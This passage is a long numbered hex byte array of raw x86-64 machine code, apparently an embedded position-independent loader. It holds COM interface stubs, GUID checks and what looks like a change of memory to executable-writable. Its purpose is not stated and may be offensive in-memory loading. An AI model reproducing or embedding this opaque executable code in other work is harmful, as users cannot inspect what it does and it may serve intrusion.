1793 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x10, 0x90,
1794 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1795 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83,
1796 0x7d, 0x20, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75,
1797 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8d, 0x88, 0x04,
1798 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00,
1799 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x07, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x74,
1800 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8d, 0x88,
1801 0xc4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00,
1802 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xe2, 0x10, 0x00, 0x00, 0x85, 0xc0,
1803 0x75, 0x1b, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89,
1804 0x10, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00,
1805 0x00, 0x00, 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00,
1806 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4,
1807 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48,
1808 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x08, 0x48,
1809 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00,
1810 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08, 0x48,
1811 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
1812 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0,
1813 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00,
1814 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02,
1815 0x01, 0xc8, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10,
1816 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
1817 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1818 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1819 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x48,
1820 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xc0, 0x01,
1821 0x00, 0x00, 0x48, 0x89, 0x95, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1822 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x57, 0x03,
1823 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1824 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xff, 0x03, 0x00, 0x00, 0x48, 0x89,
1825 0x50, 0x08, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1826 0x48, 0x8d, 0x15, 0x1c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48,
1827 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1828 0x40, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x85, 0xc8,
1829 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x04, 0x00,
1830 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1831 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89,
1832 0x50, 0x28, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1833 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48,
1834 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1835 0x3b, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x85, 0xc8,
1836 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x39, 0x05, 0x00,
1837 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1838 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x37, 0x05, 0x00, 0x00, 0x48, 0x89,
1839 0x50, 0x48, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1840 0x48, 0x8d, 0x15, 0x35, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48,
1841 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1842 0x33, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x85, 0xc8,
1843 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x31, 0x05, 0x00,
1844 0x00, 0x48, 0x89, 0x50, 0x60, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1845 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x31, 0x05, 0x00, 0x00, 0x48, 0x89,
1846 0x50, 0x68, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1847 0x48, 0x8d, 0x15, 0x64, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48,
1848 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1849 0x62, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x85, 0xc8,
1850 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x60, 0x05, 0x00,
1851 0x00, 0x48, 0x89, 0x90, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1852 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5b, 0x05, 0x00,
1853 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1854 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x05, 0x00,
1855 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1856 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x51, 0x05, 0x00,
1857 0x00, 0x48, 0x89, 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1858 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4c, 0x05, 0x00,
1859 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1860 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x46, 0x05, 0x00,
1861 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1862 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x49, 0x05, 0x00,
1863 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1864 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x44, 0x05, 0x00,
1865 0x00, 0x48, 0x89, 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1866 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x47, 0x05, 0x00,
1867 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1868 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x42, 0x05, 0x00,
1869 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1870 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x57, 0x05, 0x00,
1871 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1872 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x05, 0x00,
1873 0x00, 0x48, 0x89, 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1874 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x51, 0x05, 0x00,
1875 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1876 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4c, 0x05, 0x00,
1877 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1878 0x01, 0x00, 0x00, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1879 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00,
1880 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48,
1881 0x05, 0xed, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x49, 0x89, 0xd0,
1882 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0xe8, 0x3e,
1883 0xb3, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x4c, 0x8b,
1884 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1885 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8d, 0x45, 0xa0, 0x48, 0x89, 0xc1, 0x41,
1886 0xff, 0xd0, 0x89, 0x85, 0xac, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x01,
1887 0x00, 0x00, 0x00, 0x75, 0x45, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1888 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x48, 0x30, 0x48,
1889 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x10, 0x48, 0x8b,
1890 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x94, 0x08, 0x00, 0x00,
1891 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x49,
1892 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x89, 0x85, 0xac, 0x01,
1893 0x00, 0x00, 0x8b, 0x85, 0xac, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x30,
1894 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
1895 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
1896 0x20, 0x48, 0x83, 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00,
1897 0x80, 0xe9, 0x91, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1898 0x40, 0x28, 0x48, 0x8d, 0x88, 0x04, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45,
1899 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x51,
1900 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48,
1901 0x8b, 0x40, 0x28, 0x48, 0x8d, 0x88, 0x14, 0x08, 0x00, 0x00, 0x48, 0x8b,
1902 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
1903 0x2c, 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10,
1904 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8d, 0x88, 0x94, 0x08, 0x00, 0x00, 0x48,
1905 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2,
1906 0xe8, 0x07, 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45,
1907 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00,
1908 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00,
1909 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d,
1910 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d,
1911 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45,
1912 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f,
1913 0xc1, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4,
1914 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48,
1915 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48,
1916 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00,
1917 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8,
1918 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
1919 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1920 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
1921 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00,
1922 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1923 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89,
1924 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75,
1925 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10,
1926 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x08, 0x48,
1927 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1928 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28,
1929 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20,
1930 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1931 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89,
1932 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
1933 0x00, 0x4c, 0x8b, 0x50, 0x50, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1934 0x10, 0x4c, 0x8b, 0x45, 0x38, 0x8b, 0x4d, 0x28, 0x48, 0x8b, 0x55, 0x20,
1935 0x4d, 0x89, 0xc1, 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2,
1936 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1937 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
1938 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec,
1939 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c,
1940 0x8b, 0x50, 0x58, 0x44, 0x0f, 0xb7, 0x45, 0xec, 0x48, 0x8b, 0x45, 0x10,
1941 0x48, 0x8b, 0x40, 0x10, 0x8b, 0x4d, 0x18, 0x48, 0x8b, 0x55, 0x50, 0x48,
1942 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54, 0x24,
1943 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8b,
1944 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x41, 0x89,
1945 0xc8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89,
1946 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60, 0x5d, 0xc3, 0x55,
1947 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1948 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1949 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1950 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1951 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1952 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1953 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
1954 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1955 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66, 0x89, 0x45, 0x18,
1956 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1957 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b,
1958 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50,
1959 0x70, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x41, 0xb9, 0x00,
1960 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0xfd, 0xff,
1961 0xff, 0xff, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0xb8, 0x00, 0x00, 0x00,
1962 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1963 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80,
1964 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
1965 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1966 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
1967 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1968 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
1969 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1970 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1971 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1972 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18,
1973 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1974 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c,
1975 0x89, 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1976 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1977 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1978 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d,
1979 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1980 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1981 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48,
1982 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1983 0x40, 0x28, 0x48, 0x8b, 0x50, 0x58, 0x8b, 0x45, 0x18, 0x89, 0xc1, 0xff,
1984 0xd2, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3,
1985 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1986 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
1987 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1988 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1989 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1990 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1991 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1992 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20,
1993 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00,
1994 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1995 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf,
1996 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1997 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1998 0x48, 0x8b, 0x45, 0x30, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
1999 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
2000 0x89, 0x55, 0x18, 0x8b, 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d,
2001 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d,
2002 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
2003 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x28, 0x03,
2004 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0xd8, 0xb1,
2005 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75,
2006 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xfe, 0x01, 0x00, 0x00, 0x48,
2007 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0x9c, 0x05, 0x00, 0x00, 0x48, 0x8b,
2008 0x45, 0xf0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
2009 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x9b, 0xae, 0xff, 0xff, 0x48,
2010 0x89, 0x45, 0xe8, 0x48, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a, 0xb8, 0x00,
2011 0x00, 0x00, 0x00, 0xe9, 0xc5, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x05, 0x2e,
2012 0xff, 0xff, 0xff, 0x48, 0x8d, 0x15, 0x02, 0xff, 0xff, 0xff, 0x48, 0x29,
2013 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x85, 0xc0, 0x79, 0x0a, 0xb8,
2014 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
2015 0xe8, 0x48, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xe4, 0x48, 0x89, 0x45, 0xd0,
2016 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8,
2017 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48, 0x89, 0x54,
2018 0x24, 0x20, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48,
